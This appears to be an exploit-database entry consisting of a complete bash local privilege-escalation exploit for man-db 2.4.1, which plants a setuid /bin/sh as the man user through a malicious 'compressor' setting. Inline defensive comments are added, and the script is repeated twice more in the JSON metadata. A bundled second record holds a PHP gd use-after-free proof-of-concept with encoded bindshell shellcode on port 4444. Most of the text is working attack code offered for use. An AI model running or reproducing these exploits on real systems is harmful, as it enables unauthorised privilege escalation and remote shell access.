man-db 2.4.1 open_cat_stream() Local uid=man Exploit
2003-08-06T00:00:00
ID 1337DAY-ID-7311 Type zdt Reporter vade79 Modified 2003-08-06T00:00:00
Description
Exploit for linux platform in category local exploits
====================================================
man-db 2.4.1 open_cat_stream() Local uid=man Exploit
====================================================
#!/bin/bash
# xmandb.sh: shell command file.
#
# man-db[v2.4.1-]: local uid=man exploit.
# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)
#
# open_cat_stream() privileged call exploit.
#
# i've been conversing with the new man-db maintainer, and after the
# initial post sent to bugtraq(which i forgot to inform him), i sent him
# an email highlighting another vulnerability i forgot to mention in the
# original advisory.
#
# once he checked it out, he noticed that the routine never dropped
# privileges before/after the potential buffer/elemental overflow occured,
# and executed the (user defined) "compressor" binary. making it
# pointless to exploit this via the overflow method, and all-purpose to
# exploit this via the privileged execve() call method.
#
# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),
# he noticed it before i did, so he's on the right track. :)
#
# example:
# [v9@localhost v9]$ id
# uid=500(v9) gid=500(v9) groups=500(v9)
# [v9@localhost v9]$ ./xmandb.sh
# [*] making fake manpage directories/files...
# [*] making runme, and mansh source files...
# [*] compiling runme source...
# [*] setting "compressor" to: /tmp/runme...
# [*] executing man-db/man...
# [*] cleaning up files...
# [*] success, entering shell.
# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh
# sh-2.04$ id
# uid=15(man) gid=500(v9) groups=500(v9)
# sh-2.04$
#
# (tested on redhat7.1, from src, should work out of the box everywhere)
#
# Reviewer notes (defensive reading of the script below):
# - Mechanism, as the header states: man-db reads a user-defined
#   "compressor" command (here from ~/.manpath) and runs it while still
#   holding the man user's privileges, so the named path executes as
#   uid=man.
# - Host indicators this run leaves behind: a setuid binary owned by
#   "man" under $TMPDIR (mode 4710, set by the chmod() in runme.c) and,
#   until the cleanup step, a ~/.manpath whose "DEFINE compressor" line
#   points outside the system binary directories. The sources and the
#   ~/.manpath are removed; the setuid binary is kept on the success
#   branch.
# - Mitigation is the one the header attributes to the maintainer:
#   drop privileges before the compressor is invoked. Check the installed
#   man-db against the vendor's fixed version rather than relying on the
#   "v2.4.1-" range quoted above.
#
# Path of the man-db binary. The -V probe below only checks that the
# command prints something, so any man(1) that honours -V passes it.
MANBIN=/usr/bin/man
# Name of the throwaway manpath hierarchy created under $TMPDIR.
MANDIR=man_x
# Fixed, world-writable working directory. Every file below is created
# under a predictable name here (runme.c, mansh.c, runme, mansh), so the
# script clobbers, or follows a symlink at, anything already there.
TMPDIR=/tmp
echo "man-db[v2.4.1-]: local uid=man exploit."
echo -e "by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n"
# Sanity check: stop unless "$MANBIN -V" produced any output at all.
if [ ! "`$MANBIN -V 2>/dev/null`" ]
then
echo "[!] \"$MANBIN\" does not appear to be man-db, failed."
exit
fi
# umask 002 makes the directories, sources and the runme binary created
# below group-writable; mansh's final mode is set explicitly by chmod()
# in runme.c and is not affected.
umask 002
# Unchecked cd: if $TMPDIR is missing, the rest of the script runs in the
# caller's current directory.
cd $TMPDIR
echo "[*] making fake manpage directories/files..."
# Minimal manpath tree: man1/ holds the empty source page x.1 and cat1/
# is where man-db would write the formatted cat page; per the header,
# that write path (open_cat_stream()) is what invokes the compressor.
mkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1
touch ${MANDIR}/man1/x.1
echo "[*] making runme, and mansh source files..."
# runme.c: the program man-db will execute as the "compressor". The
# here-document delimiter is unquoted, so ${TMPDIR} is expanded by this
# shell before the C source is written. In the C: setreuid() copies the
# inherited effective uid into the real uid, system() compiles mansh.c,
# chmod() marks the result setuid (mode 4710), and unlink(argv[0])
# deletes the running binary by the path it was invoked with. The
# return values of system(), chmod() and unlink() are not checked.
cat <<EOF>runme.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int main(int argc,char **argv){
setreuid(geteuid(),geteuid());
system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh");
chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
unlink(argv[0]);
exit(0);
}
EOF
# mansh.c: setuid launcher for /bin/sh. Two portability issues in the C:
# execl() terminates its argument list with the int constant 0 rather
# than (char *)NULL, which is formally undefined where int and pointer
# widths differ, and exit() is used without including <stdlib.h>.
cat <<EOF>mansh.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(){
setreuid(geteuid(),geteuid());
execl("/bin/sh","sh",0);
exit(0);
}
EOF
echo "[*] compiling runme source..."
# The compile result is unchecked; a missing compiler is only noticed at
# the "test -u" step below.
cc runme.c -o runme
echo "[*] setting \"compressor\" to: ${TMPDIR}/runme..."
# Overwrites any existing ~/.manpath without a backup, and the cleanup
# below deletes the file outright, so a pre-existing user manpath
# configuration is lost.
echo "DEFINE compressor ${TMPDIR}/runme">~/.manpath
echo "[*] executing man-db/man..."
# -M points man at the throwaway hierarchy and -P /bin/true substitutes
# a no-op pager so nothing is displayed; all output is discarded.
$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1
echo "[*] cleaning up files..."
# Removes the scaffolding and ~/.manpath; mansh itself is only removed
# on the failure branch below.
rm -rf $MANDIR mansh.c runme.c runme ~/.manpath
# The setuid bit on mansh is the success indicator.
if test -u "${TMPDIR}/mansh"
then
echo "[*] success, entering shell."
ls -l ${TMPDIR}/mansh
${TMPDIR}/mansh
else
echo "[!] exploit failed."
rm -rf ${TMPDIR}/mansh
fi
# Bare exit returns the status of the last command; on the failure
# branch that is rm -rf (normally 0), so the exit code does not signal
# failure to a caller.
exit
{"id": "1337DAY-ID-7311", "bulletinFamily": "exploit", "title": "man-db 2.4.1 open_cat_stream() Local uid=man Exploit ", "description": "Exploit for linux platform in category local exploits", "published": "2003-08-06T00:00:00", "modified": "2003-08-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/7311", "reporter": "vade79", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-14T23:54:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category local exploits", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:50:12", "value": 3.8, "vector": "AV:L/AC:M/Au:M/C:P/I:P/A:P/"}}, "hash": "d05a90c3fe8222bf286274a1aab46846b5f0013eb429c47e7ab33b2be63e54f4", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "67c30d2ec467d81dd709a2178aa6ace7", "key": "sourceHref"}, {"hash": "1466d24f65fab971fd9c0eef16c44ffb", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "427c9cb171731fe1230965d21db75dd0", "key": "sourceData"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1466d24f65fab971fd9c0eef16c44ffb", "key": "published"}, {"hash": "275a765e4d222c8cbed80585b1fba5c5", "key": "title"}, {"hash": "e18581c73c0a36d1d2c1b38c096d4486", "key": "reporter"}, {"hash": "cbd879f87043e421582934be10c12e97", "key": "href"}], "history": [], "href": "http://0day.today/exploit/description/7311", "id": "1337DAY-ID-7311", "lastseen": "2016-04-20T01:50:12", "modified": "2003-08-06T00:00:00", "objectVersion": "1.0", "published": "2003-08-06T00:00:00", "references": [], "reporter": "vade79", "sourceData": 
"====================================================\r\nman-db 2.4.1 open_cat_stream() Local uid=man Exploit \r\n====================================================\r\n\r\n\r\n#!/bin/bash\r\n# xmandb.sh: shell command file.\r\n#\r\n# man-db[v2.4.1-]: local uid=man exploit.\r\n# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\r\n#\r\n# open_cat_stream() privileged call exploit.\r\n#\r\n# i've been conversing with the new man-db maintainer, and after the\r\n# initial post sent to bugtraq(which i forgot to inform him), i sent him\r\n# an email highlighting another vulnerability i forgot to mention in the\r\n# original advisory.\r\n#\r\n# once he checked it out, he noticed that the routine never dropped\r\n# privileges before/after the potential buffer/elemental overflow occured,\r\n# and executed the (user defined) \"compressor\" binary. making it\r\n# pointless to exploit this via the overflow method, and all-purpose to\r\n# exploit this via the privileged execve() call method.\r\n#\r\n# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),\r\n# he noticed it before i did, so he's on the right track. :)\r\n#\r\n# example:\r\n# [v9@localhost v9]$ id\r\n# uid=500(v9) gid=500(v9) groups=500(v9)\r\n# [v9@localhost v9]$ ./xmandb.sh\r\n# [*] making fake manpage directories/files...\r\n# [*] making runme, and mansh source files...\r\n# [*] compiling runme source...\r\n# [*] setting \"compressor\" to: /tmp/runme...\r\n# [*] executing man-db/man...\r\n# [*] cleaning up files...\r\n# [*] success, entering shell.\r\n# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh\r\n# sh-2.04$ id\r\n# uid=15(man) gid=500(v9) groups=500(v9)\r\n# sh-2.04$ \r\n#\r\n# (tested on redhat7.1, from src, should work out of the box everywhere)\r\n\r\nMANBIN=/usr/bin/man\r\nMANDIR=man_x\r\nTMPDIR=/tmp\r\necho \"man-db[v2.4.1-]: local uid=man exploit.\"\r\necho -e \"by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\"\r\nif [ ! \"`$MANBIN -V 2>/dev/null`\" ]\r\nthen\r\n echo \"[!] 
\\\"$MANBIN\\\" does not appear to be man-db, failed.\"\r\n exit\r\nfi\r\numask 002\r\ncd $TMPDIR\r\necho \"[*] making fake manpage directories/files...\"\r\nmkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1\r\ntouch ${MANDIR}/man1/x.1\r\necho \"[*] making runme, and mansh source files...\"\r\ncat <<EOF>runme.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\nint main(int argc,char **argv){\r\n setreuid(geteuid(),geteuid());\r\n system(\"cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh\");\r\n chmod(\"${TMPDIR}/mansh\",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);\r\n unlink(argv[0]);\r\n exit(0);\r\n}\r\nEOF\r\ncat <<EOF>mansh.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\nint main(){\r\n setreuid(geteuid(),geteuid());\r\n execl(\"/bin/sh\",\"sh\",0);\r\n exit(0);\r\n}\r\nEOF\r\necho \"[*] compiling runme source...\"\r\ncc runme.c -o runme\r\necho \"[*] setting \\\"compressor\\\" to: ${TMPDIR}/runme...\"\r\necho \"DEFINE compressor ${TMPDIR}/runme\">~/.manpath\r\necho \"[*] executing man-db/man...\"\r\n$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1\r\necho \"[*] cleaning up files...\"\r\nrm -rf $MANDIR mansh.c runme.c runme ~/.manpath\r\nif test -u \"${TMPDIR}/mansh\"\r\nthen\r\n echo \"[*] success, entering shell.\"\r\n ls -l ${TMPDIR}/mansh\r\n ${TMPDIR}/mansh\r\nelse\r\n echo \"[!] 
exploit failed.\"\r\n rm -rf ${TMPDIR}/mansh\r\nfi\r\nexit\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/7311", "title": "man-db 2.4.1 open_cat_stream() Local uid=man Exploit ", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:50:12"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8be7a8b03e0d0b6e92b55fa1f40b9528"}, {"key": "href", "hash": "b0c54a7de1fa5fc9b82baa24b84c0b37"}, {"key": "modified", "hash": "1466d24f65fab971fd9c0eef16c44ffb"}, {"key": "published", "hash": "1466d24f65fab971fd9c0eef16c44ffb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e18581c73c0a36d1d2c1b38c096d4486"}, {"key": "sourceData", "hash": "7bc60279d1b7e77f8248cc32d71ea94b"}, {"key": "sourceHref", "hash": "73ca7305ecf96be55461e1b81706d449"}, {"key": "title", "hash": "275a765e4d222c8cbed80585b1fba5c5"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "f8629bd87376d27e691219b2285b7755f97ccee64de90efcf635a4d32e2df436", "viewCount": 0, "enchantments": {"vulnersScore": 3.8}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/7311", "sourceData": "====================================================\r\nman-db 2.4.1 open_cat_stream() Local uid=man Exploit \r\n====================================================\r\n\r\n\r\n#!/bin/bash\r\n# xmandb.sh: shell command file.\r\n#\r\n# man-db[v2.4.1-]: local uid=man exploit.\r\n# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\r\n#\r\n# open_cat_stream() privileged call exploit.\r\n#\r\n# i've been conversing with the new man-db maintainer, and after the\r\n# initial post sent to bugtraq(which i forgot to inform him), i sent him\r\n# an email 
highlighting another vulnerability i forgot to mention in the\r\n# original advisory.\r\n#\r\n# once he checked it out, he noticed that the routine never dropped\r\n# privileges before/after the potential buffer/elemental overflow occured,\r\n# and executed the (user defined) \"compressor\" binary. making it\r\n# pointless to exploit this via the overflow method, and all-purpose to\r\n# exploit this via the privileged execve() call method.\r\n#\r\n# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),\r\n# he noticed it before i did, so he's on the right track. :)\r\n#\r\n# example:\r\n# [[email\u00a0protected] v9]$ id\r\n# uid=500(v9) gid=500(v9) groups=500(v9)\r\n# [[email\u00a0protected] v9]$ ./xmandb.sh\r\n# [*] making fake manpage directories/files...\r\n# [*] making runme, and mansh source files...\r\n# [*] compiling runme source...\r\n# [*] setting \"compressor\" to: /tmp/runme...\r\n# [*] executing man-db/man...\r\n# [*] cleaning up files...\r\n# [*] success, entering shell.\r\n# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh\r\n# sh-2.04$ id\r\n# uid=15(man) gid=500(v9) groups=500(v9)\r\n# sh-2.04$ \r\n#\r\n# (tested on redhat7.1, from src, should work out of the box everywhere)\r\n\r\nMANBIN=/usr/bin/man\r\nMANDIR=man_x\r\nTMPDIR=/tmp\r\necho \"man-db[v2.4.1-]: local uid=man exploit.\"\r\necho -e \"by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\"\r\nif [ ! \"`$MANBIN -V 2>/dev/null`\" ]\r\nthen\r\n echo \"[!] 
\\\"$MANBIN\\\" does not appear to be man-db, failed.\"\r\n exit\r\nfi\r\numask 002\r\ncd $TMPDIR\r\necho \"[*] making fake manpage directories/files...\"\r\nmkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1\r\ntouch ${MANDIR}/man1/x.1\r\necho \"[*] making runme, and mansh source files...\"\r\ncat <<EOF>runme.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\nint main(int argc,char **argv){\r\n setreuid(geteuid(),geteuid());\r\n system(\"cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh\");\r\n chmod(\"${TMPDIR}/mansh\",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);\r\n unlink(argv[0]);\r\n exit(0);\r\n}\r\nEOF\r\ncat <<EOF>mansh.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\nint main(){\r\n setreuid(geteuid(),geteuid());\r\n execl(\"/bin/sh\",\"sh\",0);\r\n exit(0);\r\n}\r\nEOF\r\necho \"[*] compiling runme source...\"\r\ncc runme.c -o runme\r\necho \"[*] setting \\\"compressor\\\" to: ${TMPDIR}/runme...\"\r\necho \"DEFINE compressor ${TMPDIR}/runme\">~/.manpath\r\necho \"[*] executing man-db/man...\"\r\n$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1\r\necho \"[*] cleaning up files...\"\r\nrm -rf $MANDIR mansh.c runme.c runme ~/.manpath\r\nif test -u \"${TMPDIR}/mansh\"\r\nthen\r\n echo \"[*] success, entering shell.\"\r\n ls -l ${TMPDIR}/mansh\r\n ${TMPDIR}/mansh\r\nelse\r\n echo \"[!] exploit failed.\"\r\n rm -rf ${TMPDIR}/mansh\r\nfi\r\nexit\r\n\r\n\r\n\n# 0day.today [2018-04-14] #"}
{"result": {"zdt": [{"lastseen": "2018-01-11T03:09:30", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 2, "reporter": "Stefan Esser", "published": "2007-03-20T00:00:00", "title": "PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-11T03:09:30", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-03-20T00:00:00", "id": "1337DAY-ID-7656", "href": "https://0day.today/exploit/description/7656", "sourceData": "=================================================================\r\nPHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit\r\n=================================================================\r\n\r\n\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP gd already freed resource usage exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // linux x86 bindshell on port 4444 from Metasploit\r\n $shellcode = \"\\x29\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x46\".\r\n \"\\x32\\x3c\\xe5\\x83\\xeb\\xfc\\xe2\\xf4\\x77\\xe9\\x6f\\xa6\\x15\\x58\\x3e\\x8f\".\r\n \"\\x20\\x6a\\xa5\\x6c\\xa7\\xff\\xbc\\x73\\x05\\x60\\x5a\\x8d\\x57\\x6e\\x5a\\xb6\".\r\n 
\"\\xcf\\xd3\\x56\\x83\\x1e\\x62\\x6d\\xb3\\xcf\\xd3\\xf1\\x65\\xf6\\x54\\xed\\x06\".\r\n \"\\x8b\\xb2\\x6e\\xb7\\x10\\x71\\xb5\\x04\\xf6\\x54\\xf1\\x65\\xd5\\x58\\x3e\\xbc\".\r\n \"\\xf6\\x0d\\xf1\\x65\\x0f\\x4b\\xc5\\x55\\x4d\\x60\\x54\\xca\\x69\\x41\\x54\\x8d\".\r\n \"\\x69\\x50\\x55\\x8b\\xcf\\xd1\\x6e\\xb6\\xcf\\xd3\\xf1\\x65\";\r\n\r\n // Offsets used for the overwrite (will be overwritten by findOffsets()\r\n $offset_1 = 0x55555555;\r\n $offset_2 = 0x66666666;\r\n \r\n findOffsets(); // Comment out if you want to just test the crash\r\n\r\n class dummyclass { }\r\n\r\n function myErrorHandler()\r\n {\r\n imagedestroy($GLOBALS['img']);\r\n \r\n // Clipping\r\n $GLOBALS['x'] = str_repeat(chr(0), 7311);\r\n $GLOBALS['x'][7310] = chr(0x00); \r\n $GLOBALS['x'][7309] = chr(0x01); \r\n $GLOBALS['x'][7308] = chr(0x00); \r\n\r\n $GLOBALS['x'][7307] = chr(0x7f); \r\n $GLOBALS['x'][7306] = chr(0xff); \r\n $GLOBALS['x'][7305] = chr(0xff); \r\n $GLOBALS['x'][7304] = chr(0xff); \r\n\r\n $GLOBALS['x'][7303] = chr(0); \r\n $GLOBALS['x'][7302] = chr(0); \r\n $GLOBALS['x'][7301] = chr(0); \r\n $GLOBALS['x'][7300] = chr(0); \r\n\r\n $GLOBALS['x'][7299] = chr(0x80); \r\n $GLOBALS['x'][7298] = chr(0); \r\n $GLOBALS['x'][7297] = chr(0); \r\n $GLOBALS['x'][7296] = chr(0); \r\n\r\n // True Color Image\r\n $GLOBALS['x'][0x1c38] = chr(1);\r\n // True Color Pixelmap (1st entry must be 0)\r\n $GLOBALS['x'][0x1c3c] = chr(0x08);\r\n $GLOBALS['x'][0x1c3d] = chr(0x80);\r\n $GLOBALS['x'][0x1c3e] = chr(0x04);\r\n $GLOBALS['x'][0x1c3f] = chr(0x08);\r\n\r\n return true;\r\n }\r\n \r\n function poke($addr, $value)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value);\r\n }\r\n \r\n function peek($addr)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass());\r\n }\r\n \r\n printf(\"Using offsets %08x and %08x\\n\", $offset_1, $offset_2);\r\n \r\n 
error_reporting(E_ALL);\r\n set_error_handler(\"myErrorHandler\");\r\n poke($offset_2, $offset_1);\r\n unset($d);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n // This function uses the substr_compare() vulnerability\r\n // to get the offsets. \r\n \r\n function findOffsets()\r\n {\r\n global $offset_1, $offset_2, $shellcode;\r\n // We need to NOT clear these variables,\r\n // otherwise the heap is too segmented\r\n global $memdump, $d, $arr;\r\n \r\n $sizeofHashtable = 39;\r\n $maxlong = 0x7fffffff;\r\n\r\n // Signature of a big endian Hashtable of size 256 with 1 element\r\n $search = \"\\x00\\x01\\x00\\x00\\xff\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\r\n\r\n $memdump = str_repeat(\"A\", 18192);\r\n for ($i=0; $i<400; $i++) {\r\n\t $d[$i]=array();\r\n }\r\n unset($d[350]);\r\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\r\n unset($d[351]);\r\n unset($d[352]);\r\n $arr = array();\r\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\r\n $arr[$shellcode] = 1;\r\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\r\n\r\n // If the libc memcmp leaks the information use it\r\n // otherwise we only get a case insensitive memdump\r\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\r\n\r\n for ($i=0; $i<18192; $i++) {\r\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n if ($y-$Y == 1 || $Y-$y==1){\r\n $y = chr($y);\r\n if ($b && strtoupper($y)!=$y) {\r\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\r\n $y = strtoupper($y);\r\n }\r\n }\r\n $memdump[$i] = $y;\r\n } else {\r\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\r\n if ($y-$Y != 1 && $Y-$y!=1){\r\n\t $memdump[$i] = chr(1);\r\n } else {\r\n $memdump[$i] = chr(0);\r\n } \r\n }\r\n }\r\n \r\n // Search shellcode and hashtable and calculate memory address\r\n $pos_shellcode = strpos($memdump, $shellcode);\r\n $pos_hashtable = strpos($memdump, $search);\r\n 
\r\n if ($pos_shellcode == 0 || $pos_hashtable == 0) {\r\n die (\"Unable to find offsets\");\r\n }\r\n \r\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\r\n $addr = unpack(\"L\", $addr);\r\n // Fill in both offsets \r\n $offset_1 = $addr[1] + 32;\r\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;\r\n }\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7656"}]}}